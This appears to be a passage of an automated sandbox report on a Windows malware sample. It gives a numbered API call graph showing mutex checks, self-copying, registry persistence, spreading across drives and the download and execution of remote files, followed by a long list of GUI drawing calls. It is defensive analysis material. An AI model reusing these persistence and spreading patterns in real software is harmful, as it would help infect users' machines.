425215 14257->14311 14260 4252b6 14261 4252eb RaiseException 14260->14261 14262 4252df 14260->14262 14261->14251 14262->14261 14264 426b3a __lseeki64 14263->14264 14271 42adc1 14264->14271 14270 426b5b __lseeki64 14270->14256 14272 429cb8 __lock 44 API calls 14271->14272 14273 426b3f 14272->14273 14274 426a43 14273->14274 14275 4280fe __decode_pointer 4 API calls 14274->14275 14276 426a57 14275->14276 14277 4280fe __decode_pointer 4 API calls 14276->14277 14278 426a67 14277->14278 14279 42a9ca __msize 45 API calls 14278->14279 14286 426aea 14278->14286 14281 426a85 14279->14281 14280 428083 __encode_pointer 4 API calls 14282 426adf 14280->14282 14283 426aa9 14281->14283 14290 426ad1 14281->14290 14294 42d65b 14281->14294 14284 428083 __encode_pointer 4 API calls 14282->14284 14283->14286 14287 42d65b __realloc_crt 50 API calls 14283->14287 14288 426abf 14283->14288 14284->14286 14291 426b64 14286->14291 14287->14288 14288->14286 14299 428083 14288->14299 14290->14280 14307 42adca 14291->14307 14296 42d664 14294->14296 14295 42a7af _realloc 49 API calls 14295->14296 14296->14295 14297 42d6a3 14296->14297 14298 42d684 Sleep 14296->14298 14297->14283 14298->14296 14305 428097 14299->14305 14300 4280bc GetModuleHandleW 14301 4280d7 GetProcAddress 14300->14301 14302 4280cc 14300->14302 14306 4280b4 14301->14306 14303 42ad25 __crt_waiting_on_module_handle 2 API calls 14302->14303 14304 4280d2 14303->14304 14304->14301 14304->14306 14305->14300 14305->14306 14306->14290 14310 429bde RtlLeaveCriticalSection 14307->14310 14309 426b69 14309->14270 14310->14309 14312 425235 _strlen 14311->14312 14316 41e02c 14311->14316 14313 425aa0 _malloc 44 API calls 14312->14313 14312->14316 14314 425248 14313->14314 14314->14316 14317 428620 14314->14317 14316->14260 14318 428631 14317->14318 14319 428638 14317->14319 14318->14319 14324 42865e 14318->14324 14320 427ffb __lseeki64 44 API calls 14319->14320 14321 42863d 14320->14321 14322 42515e __lseeki64 4 API calls 14321->14322 14323 42864c 14322->14323 14323->14316 14324->14323 14325 427ffb __lseeki64 44 API calls 14324->14325 14325->14321 14326->14236 14328 423cd0 14327->14328 14329 423cbf GetProcessHeap HeapFree 14327->14329 14328->14217 14329->14217 12857 40fcc0 12862 40fe50 12857->12862 12860 40fd96 12860->12860 12861 40fdcd CreateFontIndirectA GetSysColor 12860->12861 12863 40fd4f CreatePen 12862->12863 12863->12860 12864 23215a4 12872 23214a0 12864->12872 12866 23215c7 12867 2321609 12866->12867 12906 2320000 12866->12906 12876 23256f4 12867->12876 12891 2323124 12867->12891 12869 232164d 12875 23214ce 12872->12875 12873 2321542 12873->12866 12875->12873 12911 2321360 12875->12911 12877 2325702 12876->12877 12878 2325708 12877->12878 12881 232575f 12877->12881 12879 23252c4 4 API calls 12878->12879 12880 2325749 12879->12880 12880->12869 12925 2325204 12881->12925 12883 23257c0 12930 23252c4 12883->12930 12885 23257f1 12947 2323764 12885->12947 12887 23257fd 12950 40104e __set_app_type __p__fmode __p__commode 12887->12950 12892 23256f4 12891->12892 12893 2325708 12892->12893 12896 232575f 12892->12896 12894 23252c4 4 API calls 12893->12894 12895 2325749 12894->12895 12895->12869 12897 2325204 3 API calls 12896->12897 12898 23257c0 12897->12898 12899 23252c4 4 API calls 12898->12899 12900 23257f1 12899->12900 12901 2323764 GlobalAlloc 12900->12901 12902 23257fd 12901->12902 12905 40104e 293 API calls 12902->12905 12903 232583d 12903->12895 12904 2323124 299 API calls 12903->12904 12904->12895 12905->12903 12907 2321570 12906->12907 13201 2321560 GetPEB 12907->13201 12909 2321583 13202 23215a4 12909->13202 12916 2320570 12911->12916 12913 2321379 12914 232147f 12913->12914 12919 2320540 12913->12919 12914->12875 12922 23202f0 12916->12922 12918 232057b VirtualAlloc 12918->12913 12920 23202f0 12919->12920 12921 232054b VirtualFree 12920->12921 12921->12914 12924 23202f5 12922->12924 12926 2323764 GlobalAlloc 12925->12926 12927 2325232 12926->12927 12928 23252a6 12927->12928 12962 23250c4 12927->12962 12928->12883 12931 2325322 12930->12931 12932 2325377 12931->12932 12936 23253e4 12931->12936 12933 23253ae 12932->12933 12934 2323854 VirtualAlloc 12932->12934 12935 2323854 VirtualAlloc 12933->12935 12938 23253dc 12933->12938 12934->12933 12935->12938 12936->12938 12992 2323894 12936->12992 12941 23254fc 12938->12941 12995 2324654 12938->12995 12940 2323894 VirtualProtect 12943 2325548 12940->12943 12941->12940 12942 23255b9 12999 2323134 GetPEB 12942->12999 12943->12942 12945 2323894 VirtualProtect 12943->12945 12945->12943 12946 23255ca 12946->12885 12948 2323424 12947->12948 12949 232376f GlobalAlloc 12948->12949 12949->12887 12951 4010bd 12950->12951 12952 4010d1 12951->12952 12953 4010c5 __setusermatherr 12951->12953 13003 4011b8 _controlfp 12952->13003 12953->12952 12955 4010d6 _initterm __getmainargs _initterm 12956 40112a GetStartupInfoA 12955->12956 12958 40115e GetModuleHandleA 12956->12958 13004 40373e 12958->13004 12973 2323854 12962->12973 12964 23250dd 12965 2323764 GlobalAlloc 12964->12965 12966 232512f 12965->12966 12976 2324f34 12966->12976 12968 232515e 12982 2324de4 12968->12982 12970 23251b8 12971 23251e3 12970->12971 12986 2323824 12970->12986 12971->12927 12989 2323424 12973->12989 12975 232385f VirtualAlloc 12975->12964 12977 2323764 GlobalAlloc 12976->12977 12981 2324f5a 12977->12981 12978 23250b1 12978->12968 12979 2323764 GlobalAlloc 12979->12981 12980 2324de4 GlobalAlloc 12980->12981 12981->12978 12981->12979 12981->12980 12983 2324df3 12982->12983 12984 2323764 GlobalAlloc 12983->12984 12985 2324e4e 12984->12985 12985->12970 12987 2323424 12986->12987 12988 232382f VirtualFree 12987->12988 12988->12971 12991 2323429 12989->12991 12993 2323424 12992->12993 12994 232389f VirtualProtect 12993->12994 12994->12936 12996 23246c7 12995->12996 12998 23246ce 12995->12998 12996->12941 12998->12996 13000 2323904 12998->13000 12999->12946 13001 2323424 13000->13001 13002 232390f LoadLibraryA 13001->13002 13002->12998 13003->12955 13079 4047c0 13004->13079 13009 403d03 ExitProcess 13010 403d0b 7 API calls 13011 403dc0 13010->13011 13012 403ed6 Sleep _snwprintf 13011->13012 13013 403dcd 7 API calls 13011->13013 13016 403f20 13012->13016 13014 403e86 13013->13014 13015 403e8a PathFileExistsW 13013->13015 13014->13012 13017 403eaa CopyFileW 13015->13017 13018 403e9b CreateDirectoryW 13015->13018 13021 403fa7 SetFileAttributesW SetFileAttributesW RegOpenKeyExW 13016->13021 13022 40413b Sleep RegOpenKeyExW 13016->13022 13019 403ec4 13017->13019 13020 403ec6 Sleep 13017->13020 13018->13017 13019->13012 13019->13020 13025 404070 RegOpenKeyExW 13021->13025 13026 403feb RegSetValueExW RegCloseKey 13021->13026 13023 404220 RegOpenKeyExW 13022->13023 13024 40416c RegQueryValueExW 13022->13024 13029 404246 RegQueryValueExW 13023->13029 13030 4043f8 RegOpenKeyExW 13023->13030 13027 404214 RegCloseKey 13024->13027 13028 40419b RegSetValueExW 13024->13028 13031 404096 RegSetValueExW RegCloseKey 13025->13031 13032 40411b 13025->13032 13026->13025 13027->13023 13028->13027 13036 404291 RegOpenKeyExW 13029->13036 13037 404273 RegSetValueExW 13029->13037 13034 4044a6 RegOpenKeyExW 13030->13034 13035 40441e 13030->13035 13031->13032 13105 40206e memset CreateProcessW 13032->13105 13043 404554 RegOpenKeyExW 13034->13043 13045 4044cc 13034->13045 13048 40449a RegCloseKey 13035->13048 13049 40443d RegQueryValueExW 13035->13049 13041 4042b3 RegCreateKeyExA 13036->13041 13042 4042d9 RegOpenKeyExW 13036->13042 13037->13036 13041->13042 13050 4043ec RegCloseKey 13042->13050 13051 4042ff RegQueryValueExW 13042->13051 13046 404576 RegQueryValueExW 13043->13046 13047 4045cd Sleep CreateThread Sleep 13043->13047 13052 404548 RegCloseKey 13045->13052 13053 4044eb RegQueryValueExW 13045->13053 13054 4045c1 RegCloseKey 13046->13054 13055 4045a3 RegSetValueExW 13046->13055 13094 401fac memset memset ExpandEnvironmentStringsW _snwprintf PathFileExistsW 13047->13094 13141 402c41 memset GetModuleFileNameW Sleep _wfopen 13047->13141 13048->13034 13049->13035 13057 404472 RegSetValueExW 13049->13057 13050->13030 13058 40434a RegQueryValueExW 13051->13058 13059 40432c RegSetValueExW 13051->13059 13052->13043 13053->13045 13062 404520 RegSetValueExW 13053->13062 13054->13047 13055->13054 13057->13035 13060 404395 RegQueryValueExW 13058->13060 13061 404377 RegSetValueExW 13058->13061 13059->13058 13064 4043e0 RegCloseKey 13060->13064 13065 4043c2 RegSetValueExW 13060->13065 13061->13060 13062->13045 13064->13050 13065->13064 13066 404604 Sleep CreateThread Sleep 13069 404632 13066->13069 13134 4035e4 11 API calls 13066->13134 13067 40466b Sleep 13068 404676 Sleep 13067->13068 13077 404694 13068->13077 13069->13067 13070 404648 Sleep 13069->13070 13098 401cda memset 13070->13098 13072 4046a1 Sleep memset _snprintf 13073 401cda 8 API calls 13072->13073 13074 4046f5 Sleep 13073->13074 13074->13077 13075 40471f Sleep memset _snprintf 13108 401674 InternetOpenA 13075->13108 13077->13068 13077->13072 13077->13075 13078 40477e CreateThread 13077->13078 13078->13077 13080 40374b Sleep 13079->13080 13081 40317d GetModuleHandleA 13080->13081 13082 403236 Sleep 13081->13082 13083 40321c GetProcAddress 13081->13083 13090 403244 13082->13090 13083->13082 13084 40322e ExitProcess 13083->13084 13085 40326c Sleep 13086 403281 13085->13086 13088 4032a2 CreateMutexA GetLastError 13086->13088 13089 403287 GetModuleHandleA 13086->13089 13088->13009 13088->13010 13091 40327a 13089->13091 13092 403298 ExitProcess 13089->13092 13090->13085 13093 403262 ExitProcess 13090->13093 13126 401e97 CreateToolhelp32Snapshot 13090->13126 13091->13086 13095 402029 _wfopen 13094->13095 13096 402066 13094->13096 13095->13096 13097 40204b fclose SetFileAttributesW 13095->13097 13096->13066 13096->13067 13097->13096 13099 401d01 _snprintf 13098->13099 13100 401d1d 13098->13100 13099->13100 13101 401d41 InternetOpenA 13100->13101 13102 401d25 _snprintf 13100->13102 13103 401d81 Sleep InternetCloseHandle InternetCloseHandle 13101->13103 13104 401d63 InternetOpenUrlA 13101->13104 13102->13101 13103->13069 13104->13103 13106 4020c6 Sleep ExitProcess 13105->13106 13107 4020ca Sleep ShellExecuteW 13105->13107 13107->13106 13109 401ccd InternetCloseHandle 13108->13109 13110 40169d InternetOpenUrlA 13108->13110 13125 4019f8 13109->13125 13111 401cc4 InternetCloseHandle 13110->13111 13112 4016be PathFindFileNameA 13110->13112 13111->13109 13112->13111 13113 4016d4 13112->13113 13114 40172f HttpQueryInfoA 13113->13114 13115 40174e 13113->13115 13114->13115 13116 4017a9 HttpQueryInfoA 13115->13116 13117 4017c8 13115->13117 13116->13117 13118 401823 HttpQueryInfoA 13117->13118 13119 401842 13117->13119 13118->13119 13120 40189d HttpQueryInfoA 13119->13120 13121 4018bc 13119->13121 13120->13121 13122 401945 InternetCloseHandle InternetCloseHandle 13121->13122 13123 401926 HttpQueryInfoA 13121->13123 13124 40196a 13122->13124 13123->13122 13124->13111 13124->13125 13125->13077 13127 401eb2 13126->13127 13128 401eb9 Process32First 13126->13128 13127->13090 13128->13127 13129 401edd CharLowerA 13128->13129 13130 401eff 13129->13130 13131 401f88 Process32Next 13130->13131 13132 401f7a CloseHandle 13130->13132 13131->13129 13133 401f9f FindCloseChangeNotification 13131->13133 13132->13127 13133->13127 13135 403732 ExitThread 13134->13135 13136 4036c3 SetFileAttributesW 13134->13136 13137 4036df 13136->13137 13137->13135 13138 4036ec GetDriveTypeW 13137->13138 13139 40370b SetCurrentDirectoryW 13137->13139 13152 4032a4 memset memset FindFirstFileW 13137->13152 13138->13137 13138->13139 13139->13137 13142 402cca Sleep 13141->13142 13143 402c9b fseek ftell fclose 13141->13143 13144 402cd5 memset memset GetLogicalDriveStringsW 13142->13144 13143->13142 13145 402d1c 13144->13145 13146 402de3 Sleep 13145->13146 13147 402d2a GetDriveTypeW 13145->13147 13148 402da7 GetDriveTypeW 13145->13148 13151 402d46 13145->13151 13146->13144 13147->13145 13147->13148 13148->13151 13149 402d54 SetErrorMode GetVolumeInformationW 13149->13151 13150 402204 70 API calls 13150->13151 13151->13145 13151->13148 13151->13149 13151->13150 13153 4035e2 13152->13153 13158 403302 13152->13158 13153->13137 13154 4035b3 Sleep FindNextFileW 13157 4035d6 FindClose 13154->13157 13154->13158 13155 403323 SetCurrentDirectoryW 13155->13158 13156 40334a GetFullPathNameW 13156->13154 13156->13158 13157->13153 13158->13154 13158->13155 13158->13156 13159 4032a4 33 API calls 13158->13159 13160 401000 wcsstr 13158->13160 13162 4033f4 CharLowerW 13158->13162 13170 403418 13158->13170 13173 4035a6 Sleep 13158->13173 13174 403538 PathFindFileNameW 13158->13174 13175 40356a SetFileAttributesW DeleteFileW Sleep CopyFileW 13158->13175 13161 40333a SetCurrentDirectoryW 13159->13161 13160->13158 13161->13158 13176 401000 wcsstr 13162->13176 13165 403429 Sleep 13165->13158 13168 401294 28 API calls 13169 4034a8 Sleep 13168->13169 13169->13158 13170->13168 13171 401294 28 API calls 13170->13171 13177 401da3 CoInitialize CoCreateInstance 13170->13177 13182 401294 CreateFileW 13170->13182 13172 4034e8 Sleep 13171->13172 13172->13158 13173->13158 13174->13158 13174->13173 13175->13173 13176->13158 13178 401ddc 13177->13178 13179 401e8d CoUninitialize 13177->13179 13180 401e82 13178->13180 13181 401e69 Sleep 13178->13181 13179->13165 13180->13179 13181->13180 13183 40138d GetFileSize 13182->13183 13184 401386 Sleep 13182->13184 13185 4013aa CloseHandle 13183->13185 13186 4013bd CreateFileW GetFileSize 13183->13186 13184->13158 13185->13184 13187 40141a SetFilePointer CreateFileMappingA 13186->13187 13188 4013fb CloseHandle CloseHandle 13186->13188 13189 401478 MapViewOfFile 13187->13189 13190 401459 CloseHandle CloseHandle 13187->13190 13188->13184 13191 4014c6 13189->13191 13192 40149b CloseHandle CloseHandle CloseHandle 13189->13192 13190->13184 13197 4011f4 GlobalAlloc 13191->13197 13192->13184 13195 4011f4 2 API calls 13196 4015b5 8 API calls 13195->13196 13196->13184 13198 40128d lstrlenA memset memcpy 13197->13198 13199 401212 13197->13199 13198->13195 13199->13199 13200 40127a GlobalFree 13199->13200 13200->13198 13201->12909 13203 23214a0 2 API calls 13202->13203 13204 23215c7 13203->13204 13205 2321609 13204->13205 13206 2320000 302 API calls 13204->13206 13208 2323124 299 API calls 13205->13208 13209 23256f4 299 API calls 13205->13209 13206->13205 13207 232164d 13208->13207 13209->13207 14330 402df9 14 API calls 14331 403073 InternetCloseHandle Sleep 14330->14331 14332 402f4f InternetOpenUrlW 14330->14332 14333 403099 memset rand rand _snwprintf URLDownloadToFileW 14331->14333 14334 40316f ExitThread 14331->14334 14335 403067 InternetCloseHandle 14332->14335 14336 402f7d CreateFileW 14332->14336 14333->14334 14337 403114 memset _snwprintf DeleteFileW Sleep 14333->14337 14335->14331 14338 40305b CloseHandle 14336->14338 14339 402fac LoadImageA 14336->14339 14340 40206e 4 API calls 14337->14340 14338->14335 14341 402ffc CloseHandle _snwprintf DeleteFileW Sleep 14339->14341 14342 402fcf 14339->14342 14343 40316e 14340->14343 14345 40206e 4 API calls 14341->14345 14342->14341 14344 402fd8 WriteFile 14342->14344 14343->14334 14344->14339 14346 40304c 14345->14346 14346->14338
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000007B), ref: 0040B567
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040B578
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001,?,?,?,0000007B), ref: 0040B59E
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,0000007B), ref: 0040B5A9
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AEE8), ref: 0040B63E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040B648
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0040B654
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040B662
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6D7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8003FFD,0044A652), ref: 0040B6EA
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6F5
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,0044A555), ref: 0040B701
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B712
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040B727
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B738
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040B74B
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040B7A2
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040B7B6
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040B7CA
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000030,00000000,00000001), ref: 0040B7E7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040B7F6
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040B838
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040B849
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040B870
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040B899
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040B8A6
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040B8B5
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,?,00000030,00000000,00000001), ref: 0040B8BD
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,00000000), ref: 0040B8CF
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040B8E7
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040B8FF
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040B99B
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040B9B4
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040B9C5
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040B9D8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9E3
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040B9F2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9FD
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040BA09
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AF28), ref: 0040BA9E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040BAA8
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040BAB4
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040BAC2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BB9C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8003FFD,?), ref: 0040BBB5
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBC6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040BBD9
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBE4
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040BBF3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBFE
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040BC0A
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040BC48
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040BC5C
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040BC70
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BC8D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040BC9C
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BCDE
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040BCEF
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BD16
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BD3F
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BD4C
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BD5B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BD63
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040BD75
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BD8D
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BDA5
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040BE3E
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040BE52
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040BE66
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BE83
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040BE92
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BED2
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040BEE3
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BF0A
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BF33
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BF40
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BF4F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BF57
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040BF69
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BF81
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BF99
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AF68), ref: 0040C02E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C03D
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,?,00000001), ref: 0040C050
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C05E
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C0B0
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C0C1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C0E7
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C0F2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040C149
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040C15D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040C171
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C18E
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040C19D
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C1DF
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040C1F0
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C217
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C240
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C24D
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C25C
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C264
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,00000000), ref: 0040C276
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C28E
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C2A6
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AFA8), ref: 0040C361
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C36B
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C377
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C385
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AFE8), ref: 0040C441
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C44B
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C457
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C465
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C507
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040C51A
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C525
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040C531
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C542
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040C557
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C568
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C57B
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C5B7
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C5C8
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C5EE
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C5F9
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C674
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040C68D
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C69E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C6B1
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6BC
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,0044A658), ref: 0040C6CB
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6D6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040C6E2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040C720
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040C734
